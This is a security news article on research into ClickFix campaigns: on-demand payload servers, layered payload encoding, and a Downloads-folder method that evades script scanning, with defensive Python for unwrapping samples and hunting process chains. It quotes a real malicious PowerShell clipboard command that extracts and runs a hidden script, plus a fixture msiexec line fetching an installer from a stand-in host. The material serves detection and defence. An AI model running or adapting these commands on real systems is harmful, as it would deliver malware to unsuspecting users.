Researcher Analyzes 3,000 Live ClickFix Payloads, Exposing API-Driven Malware Delivery

ClickFix, the trick that fools people into running malware by hand, has quietly grown a back office.

New research shows the malicious commands behind its fake “prove you’re human” pages are now handed out by API-driven servers that give each visitor the same malware in a different disguise. The same research also turned up a new delivery method built to slip past Windows’ script scanning.

Security researcher Bert-Jan Pals took apart several ClickFix platforms and analyzed roughly 3,000 payloads from live campaigns. He presented the findings at OrangeCon in early June and published the details on June 30.

ClickFix is simple by design. A booby-trapped page shows a fake CAPTCHA or error, hidden JavaScript drops a command into your clipboard, and the page tells you to press a key combo, paste, and hit Enter. You run the malware yourself.

There’s usually no exploit at the first step and often no file for traditional antivirus to flag, so conventional email and endpoint controls have less to catch.

It works well enough that ESET measured a 517% jump from late 2024 into the first half of 2025, and Microsoft’s 2025 Digital Defense Report put it at 47% of the initial-access cases seen by its Defender Experts team.

The technique now has its own entry in MITRE ATT&CK, T1204.004.

Payloads made to order

The new part is how the payloads are produced. Pals found the pages pulling their commands from backend servers that work like an on-demand service: they take requests, check an access token, log the caller, and return a freshly scrambled command each time.

He asked one server for 100 payloads and got 100 different ones, wrapped in a rotating mix of Base64, AES, TripleDES, Rijndael, and Deflate. Strip the wrapping and, at least for now, they all unpack to the same script, which runs in memory through a PowerShell runspace.

The disguise is disposable; the malware under it is not, though Pals warns the core payload will likely start changing per victim before long. The same platform serves lures in 25 languages and matches the command to the visitor’s operating system, with macOS versions running alongside Windows.
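One practical consequence of "same script, different disguise" is that samples should be clustered by what is under the wrapper, not by the wrapper itself. The following is an added example, not Pals' tooling or any code from the page: it builds constructed payloads by stacking random Base64 and raw-Deflate layers (two of the wrappers named above) over a stand-in core script, then peels the layers off until a script surfaces and hashes the result. The cipher layers (AES, TripleDES, Rijndael) are not handled here, since stripping them means first lifting the key and IV out of the PowerShell stub; the unwrapper simply stops when it meets a layer it cannot decode. The core script, the wrapper depth and the sample count are all assumptions.

```python
"""Added example, not Pals' tooling or the page's own code: peel disposable
Base64/Deflate wrappers off ClickFix-style payloads and cluster samples by
the SHA-256 of the core script underneath. All samples are constructed."""
import base64
import binascii
import hashlib
import random
import string
import zlib

# Constructed stand-in for the shared core script (the real script is not on the page).
CORE_SCRIPT = b"$rs=[runspacefactory]::CreateRunspace();$rs.Open();# constructed core\n"
B64_CHARS = set(string.ascii_letters + string.digits + "+/=")


def wrap_b64(data: bytes) -> bytes:
    return base64.b64encode(data)


def wrap_deflate(data: bytes) -> bytes:
    # PowerShell's DeflateStream emits raw deflate with no zlib header (wbits=-15).
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()


def make_samples(n: int, seed: int = 7) -> list:
    """Mimic an on-demand server: same core, fresh random wrapper stack per request."""
    rng = random.Random(seed)
    out = []
    for _ in range(n):
        data = CORE_SCRIPT
        for _ in range(rng.randint(1, 6)):  # assumed depth range
            data = rng.choice([wrap_b64, wrap_deflate])(data)
        out.append(data)
    return out


def looks_like_script(data: bytes) -> bool:
    """Printable ASCII that contains characters no Base64 string can hold."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return False
    return all(ch in string.printable for ch in text) and any(ch not in B64_CHARS for ch in text)


def try_b64(data: bytes):
    try:
        return base64.b64decode(data, validate=True)
    except (binascii.Error, ValueError):
        return None


def try_deflate(data: bytes):
    try:
        return zlib.decompress(data, -15)
    except zlib.error:
        return None


def unwrap(data: bytes, max_layers: int = 16):
    """Strip layers until a script surfaces; returns (core, [layer names, outermost first])."""
    layers = []
    while len(layers) < max_layers and not looks_like_script(data):
        for name, peel in (("base64", try_b64), ("deflate", try_deflate)):
            out = peel(data)
            if out:
                data = out
                layers.append(name)
                break
        else:
            break  # unknown layer (e.g. a cipher needing the stub's key): stop here
    return data, layers


def core_hash(payload: bytes) -> str:
    return hashlib.sha256(unwrap(payload)[0]).hexdigest()


def cluster(payloads):
    """Group payloads by core hash: the wrappers differ, the script under them does not."""
    groups = {}
    for p in payloads:
        groups.setdefault(core_hash(p), []).append(p)
    return groups


if __name__ == "__main__":
    samples = make_samples(100)
    print(len(set(samples)), "distinct byte strings,", len(cluster(samples)), "distinct core script(s)")
```

The stop condition matters: a decoder that keeps trying layers on the final script will occasionally "succeed" on text that is not Base64 and corrupt the result, so the loop halts as soon as the data reads as a script. In real triage the hash of the core is the indicator worth sharing; the hash of the served payload changes on every request and is nearly useless.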

The “as-a-service” label is not just branding. ESET has tracked criminals selling ready-made ClickFix builders to other attackers. Pals found a parallel commercialization one layer deeper, in how each payload is churned out on request.

A quieter way in: the Downloads-folder method

The second finding is a direct answer to defenders who watch the clipboard. Instead of copying a malicious command, the newer pages copy a harmless-looking one.

The page quietly downloads a file to the Downloads folder, and the clipboard gets a short “orchestrator” line that moves that file, unpacks it, and runs the script inside. Because the pasted line is only that orchestrator and not the payload itself, it is built to slide past AMSI, the Windows feature that lets antivirus scan scripts before they run. The bad code sits in the downloaded file, off to the side. The observed clipboard line looked like this:

powershell -C "$t=$env:TMP;Move-Item \"$HOME\Downloads\tmp.zip\" \"$t\7947.zip\";tar -xf \"$t\7947.zip\" -C \"$t\";conhost --headless powershell -ExecutionPolicy Bypass -File \"$t\tmp.ps1\" # \"* I am not a robot reCAPTCHA Verification ID:7947 *\""

Execution has drifted toward stealth as well. The original 2024 lure told people to press Windows+R and paste into the Run box. A newer version, common through 2025 and into 2026, points them to the Windows+X menu and Windows Terminal instead. Terminal use looks more ordinary, and unlike the Run box, it leaves no trace in the RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) that investigators normally check.

ClickFix stopped being a criminals-only tool a while ago. Proofpoint tied state-backed groups from Russia, Iran, and North Korea, including APT28, MuddyWater, and Kimsuky, to campaigns that dropped ClickFix into their existing infection chains, and North Korean crews built a fake-job “ClickFake Interview” version to hit cryptocurrency workers.

The trick has spawned named relatives such as FileFix and DownloadFix that lean on other trusted Windows tools. The scale is not theoretical either: security firm Expel found one ClearFake wave that likely infected as many as 147,521 systems since late August 2025.

What defenders should watch

The defensive lesson has not changed. The details have. The dependable signals are process chains, not clipboard text: explorer.exe or WindowsTerminal.exe launching powershell.exe, cmd.exe, or msiexec.exe, and that child reaching out to the network right after.

Those were the most common launchers in Pals' data, with PowerShell and cmd tied at about 39% each and msiexec close behind at 34%. The shares add up to more than 100% because a single payload can chain more than one of them.

Behavioral EDR, application-control rules that limit which programs can call script interpreters, and plain user guidance (“never paste a command you were told to run into the Run box or a terminal”) all still hold. The Downloads-folder method adds one more thing to hunt: an innocent-looking one-liner that touches the Downloads folder and then spawns a hidden PowerShell.
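The hunt described in this section and the orchestrator line shown earlier can be expressed as a small scoring rule over process-creation and network events. The following is an added example, not code from the page or from Pals' research; it runs over constructed, Sysmon-style events whose field names, timestamps, file names and addresses are all assumptions. It scores each process start on three things the page calls out: a launcher-to-interpreter parent chain, a command line that touches the Downloads folder and then spawns a headless conhost, and an outbound connection from the same process shortly after launch.

```python
"""Added example (not from the page or from Pals' research): hunt ClickFix
launch chains over constructed, Sysmon-style events. Field names, the
30-second network window and the sample events are assumptions."""
import re

LAUNCHERS = {"explorer.exe", "windowsterminal.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "msiexec.exe"}
NET_WINDOW_S = 30  # assumed: outbound connection within 30 s of process start

# Traits of the observed orchestrator line: touches Downloads, hides the host window.
RE_DOWNLOADS = re.compile(r"\\Downloads\\", re.IGNORECASE)
RE_HEADLESS = re.compile(r"conhost(\.exe)?\s+--?headless", re.IGNORECASE)
RE_BYPASS = re.compile(r"-(ExecutionPolicy|ep)\s+Bypass", re.IGNORECASE)
RE_HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden", re.IGNORECASE)

# Constructed events: t is seconds, pid ties a network event to its process.
SAMPLE_EVENTS = [
    {"type": "process", "t": 100, "pid": 4001, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe /c ipconfig /all"},
    {"type": "process", "t": 200, "pid": 4100, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # Modelled on the clipboard line in the article, with a made-up ID and simplified quoting.
     "cmd": r'powershell -C "$t=$env:TMP;Move-Item $HOME\Downloads\tmp.zip $t\1234.zip;'
            r'tar -xf $t\1234.zip -C $t;conhost --headless powershell -ExecutionPolicy Bypass -File $t\tmp.ps1"'},
    {"type": "process", "t": 300, "pid": 4200,
     "parent": r"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21\WindowsTerminal.exe",
     "image": r"C:\Windows\System32\msiexec.exe", "cmd": "msiexec /i https://update.example.invalid/u.msi /qn"},
    {"type": "network", "t": 304, "pid": 4200, "dst": "203.0.113.10:443"},
    {"type": "process", "t": 400, "pid": 4300, "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\msiexec.exe", "cmd": "msiexec /V"},
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score_process(ev: dict, net_events: list):
    """Return (score, reasons) for one process-creation event."""
    reasons = []
    parent, image, cmd = basename(ev["parent"]), basename(ev["image"]), ev["cmd"]
    if parent in LAUNCHERS and image in INTERPRETERS:
        reasons.append(f"{parent} -> {image}")
    if RE_DOWNLOADS.search(cmd) and RE_HEADLESS.search(cmd):
        reasons.append("Downloads-folder orchestrator (Downloads path + headless conhost)")
    if RE_BYPASS.search(cmd) or RE_HIDDEN.search(cmd):
        reasons.append("execution-policy bypass or hidden window")
    for n in net_events:  # first outbound connection from the same PID inside the window
        if n["pid"] == ev["pid"] and 0 <= n["t"] - ev["t"] <= NET_WINDOW_S:
            reasons.append(f"network to {n['dst']} {n['t'] - ev['t']}s after start")
            break
    return len(reasons), reasons


def hunt(events: list, threshold: int = 2):
    """Return [(pid, score, reasons)] for process starts at or above the threshold."""
    procs = [e for e in events if e["type"] == "process"]
    nets = [e for e in events if e["type"] == "network"]
    hits = []
    for ev in procs:
        score, reasons = score_process(ev, nets)
        if score >= threshold:
            hits.append((ev["pid"], score, reasons))
    return hits


if __name__ == "__main__":
    for pid, score, reasons in hunt(SAMPLE_EVENTS):
        print(pid, score, "; ".join(reasons))
```

A user opening cmd from Explorer and running a network tool by hand also scores two, so the threshold is a starting point for a hunt, not a blocking rule; the Downloads-plus-headless-conhost pairing and the policy-bypass flag are the traits that separate the orchestrator from ordinary admin work. None of this depends on the Run box, which is the point: a Windows+X terminal session leaves nothing in RunMRU, but it still produces exactly this parent-child chain.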

Pals also listed three payload servers seen during the research:

  • comicstar[.]lat
  • babybon[.]cfd
  • merkantalolol[.]asia

A connection to one of these does not prove infection. It means a command was most likely placed in someone’s clipboard.

Pals’ verdict on the technique is blunt: “ClickFix is here to stay.” The pattern across his research is that ClickFix shifts the moment defenders catch up, and the move from one-off scripts to on-demand payload servers is what keeps that adaptation cheap to repeat.

The next thing worth watching is whether the malware itself, not just its wrapper, starts changing from one victim to the next.
